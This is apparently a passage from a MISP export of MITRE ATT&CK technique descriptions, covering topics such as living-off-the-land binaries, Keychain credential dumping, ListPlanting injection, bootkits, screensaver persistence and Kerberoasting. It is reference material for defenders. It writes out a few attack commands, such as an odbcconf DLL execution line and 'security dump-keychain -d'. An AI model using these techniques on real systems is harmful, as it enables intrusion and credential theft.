One method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1627/001) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1627/001) methods, this requires that the user has granted the ACCESS_FINE_LOCATION and ACCESS_BACKGROUND_LOCATION permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include "Allow only while using the app", which will effectively prohibit background location collection.

Similarly, on iOS, developers can use built-in APIs to setup and execute geofencing. Depending on the use case, the app will either need to call requestWhenInUseAuthorization() or requestAlwaysAuthorization(), depending on when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground.

[Geofencing](https://attack.mitre.org/techniques/T1627/001) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific input prompts and/or advertisements.

The tag is: misp-galaxy:mitre-attack-pattern="Geofencing - T1627.001"

Table 6369. Table References

Links

https://attack.mitre.org/techniques/T1627/001

https://blog.lookout.com/esurv-research

Msiexec - T1218.007

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007"

Table 6370. Table References

Links

https://attack.mitre.org/techniques/T1218/007

https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec

https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated

https://lolbas-project.github.io/lolbas/Binaries/Msiexec/

Odbcconf - T1218.008

Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.

Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}</code>). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008"

Table 6371. Table References

Links

https://attack.mitre.org/techniques/T1218/008

https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/

https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/

https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

Keychain - T1634.001

Adversaries may collect keychain data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.

On the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. By utilizing a privilege escalation exploit or existing root access, adversaries can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)

The tag is: misp-galaxy:mitre-attack-pattern="Keychain - T1634.001"

Table 6372. Table References

Links

https://attack.mitre.org/techniques/T1634/001

https://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/

https://developer.apple.com/documentation/security/keychain_services

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html

Domains - T1583.001

Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.

Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)

Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)

Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Domains - T1583.001"

Table 6373. Table References

Links

https://attack.mitre.org/techniques/T1583/001

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html

https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/

https://threatconnect.com/blog/infrastructure-research-hunting/

https://us-cert.cisa.gov/ncas/alerts/aa20-258a

https://us-cert.cisa.gov/ncas/tips/ST05-016

https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf

https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/

https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/

https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/

https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/

https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/

Domains - T1584.001

Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)

Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)

Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Domains - T1584.001"

Table 6374. Table References

Links

https://attack.mitre.org/techniques/T1584/001

https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover

https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/

https://unit42.paloaltonetworks.com/domain-shadowing/

https://www.icann.org/groups/ssac/documents/sac-007-en

Keychain - T1555.001

Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service.

Keychains can be viewed and edited through the Keychain Access application or using the command-line utility <code>security</code>. Keychain files are located in <code>~/Library/Keychains/</code>, <code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann)

Adversaries may gather user credentials from Keychain storage/memory. For example, the command <code>security dump-keychain –d</code> will dump all Login Keychain credentials from <code>~/Library/Keychains/login.keychain-db</code>. Adversaries may also directly read Login Keychain credentials from the <code>~/Library/Keychains/login.keychain</code> file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)

The tag is: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001"

Table 6375. Table References

Links

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

https://attack.mitre.org/techniques/T1555/001

https://developer.apple.com/documentation/security/keychain_services

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py

https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption

https://www.netmeister.org/blog/keychain-passwords.html

ListPlanting - T1055.015

Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.

List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application’s list-view settings are stored within the process' memory in a <code>SysListView32</code> control.

ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the <code>SysListView32</code> child of the victim process window (via Windows API calls such as <code>FindWindow</code> and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.

Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored <code>WriteProcessMemory</code> function. For example, an adversary can use the <code>PostMessage</code> and/or <code>SendMessage</code> API functions to send <code>LVM_SETITEMPOSITION</code> and <code>LVM_GETITEMPOSITION</code> messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020)

Finally, the payload is triggered by sending the <code>LVM_SORTITEMS</code> message to the <code>SysListView32</code> child of the process window, with the payload within the newly allocated buffer passed and executed as the <code>ListView_SortItems</code> callback.

The tag is: misp-galaxy:mitre-attack-pattern="ListPlanting - T1055.015"

Table 6376. Table References

Links

https://attack.mitre.org/techniques/T1055/015

https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview

https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

Launchctl - T1569.001

Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)

Adversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: <code>launchctl load</code>,<code>launchctl unload</code>, and <code>launchctl start</code>. Adversaries can use scripts or manually run the commands <code>launchctl load -w "%s/Library/LaunchAgents/%s"</code> or <code>/bin/launchctl load</code> to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001"

Table 6377. Table References

Links

https://attack.mitre.org/techniques/T1569/001

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

https://ss64.com/osx/launchctl.html

Malware - T1587.001

Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)

As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.

Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)

The tag is: misp-galaxy:mitre-attack-pattern="Malware - T1587.001"

Table 6378. Table References

Links

https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/

https://attack.mitre.org/techniques/T1587/001

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

Malware - T1588.001

Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.

In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).

The tag is: misp-galaxy:mitre-attack-pattern="Malware - T1588.001"

Table 6379. Table References

Links

https://attack.mitre.org/techniques/T1588/001

https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop

Credentials - T1589.001

Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.

Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Credentials - T1589.001"

Table 6380. Table References

Links

https://attack.mitre.org/techniques/T1589/001

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://github.com/dxa4481/truffleHog

https://github.com/michenriksen/gitrob

https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/

https://sec.okta.com/scatterswine

https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196

https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/

https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/

Software - T1592.002

Adversaries may gather information about the victim’s host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Software - T1592.002"

Table 6381. Table References

Links

https://attack.mitre.org/techniques/T1592/002

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://threatconnect.com/blog/infrastructure-research-hunting/

Bootkit - T1542.003

Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)

The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.

The tag is: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003"

Table 6382. Table References

Links

http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion

https://attack.mitre.org/techniques/T1542/003

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf

Firmware - T1592.003

Adversaries may gather information about the victim’s host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: misp-galaxy:mitre-attack-pattern="Firmware - T1592.003"

Table 6383. Table References

Links

https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/

https://attack.mitre.org/techniques/T1592/003

ROMMONkit - T1542.004

Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)

ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.

The tag is: misp-galaxy:mitre-attack-pattern="ROMMONkit - T1542.004"

Table 6384. Table References

Links

https://attack.mitre.org/techniques/T1542/004

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Screensaver - T1546.002

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop\</code>) and could be manipulated to achieve persistence:

  • <code>SCRNSAVE.exe</code> - set to malicious PE path

  • <code>ScreenSaveActive</code> - set to '1' to enable the screensaver

  • <code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock

  • <code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002"

Table 6385. Table References

Links

https://attack.mitre.org/techniques/T1546/002

https://en.wikipedia.org/wiki/Screensaver

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

WHOIS - T1596.002

Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)

Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="WHOIS - T1596.002"

Table 6386. Table References

Links

https://attack.mitre.org/techniques/T1596/002

https://www.whois.net/

Tool - T1588.002

Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).

The tag is: misp-galaxy:mitre-attack-pattern="Tool - T1588.002"

Table 6387. Table References

Links

https://attack.mitre.org/techniques/T1588/002

https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/

https://www.recordedfuture.com/identifying-cobalt-strike-servers/

Server - T1583.004

Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)

The tag is: misp-galaxy:mitre-attack-pattern="Server - T1583.004"

Table 6388. Table References

Links

https://attack.mitre.org/techniques/T1583/004

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://threatconnect.com/blog/infrastructure-research-hunting/

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

Botnet - T1583.005

Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)

The tag is: misp-galaxy:mitre-attack-pattern="Botnet - T1583.005"

Table 6389. Table References

Links

https://attack.mitre.org/techniques/T1583/005

https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/

https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/

https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/

https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html

https://www.imperva.com/learn/ddos/booters-stressers-ddosers/

Kerberoasting - T1558.003

Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015)

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)

This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)

Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"

Table 6390. Table References

Links

https://adsecurity.org/?p=2293

https://attack.mitre.org/techniques/T1558/003

https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/

https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1

https://msdn.microsoft.com/library/ms677949.aspx

https://redsiege.com/kerberoast-slides

https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx

https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/

Serverless - T1583.007

Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

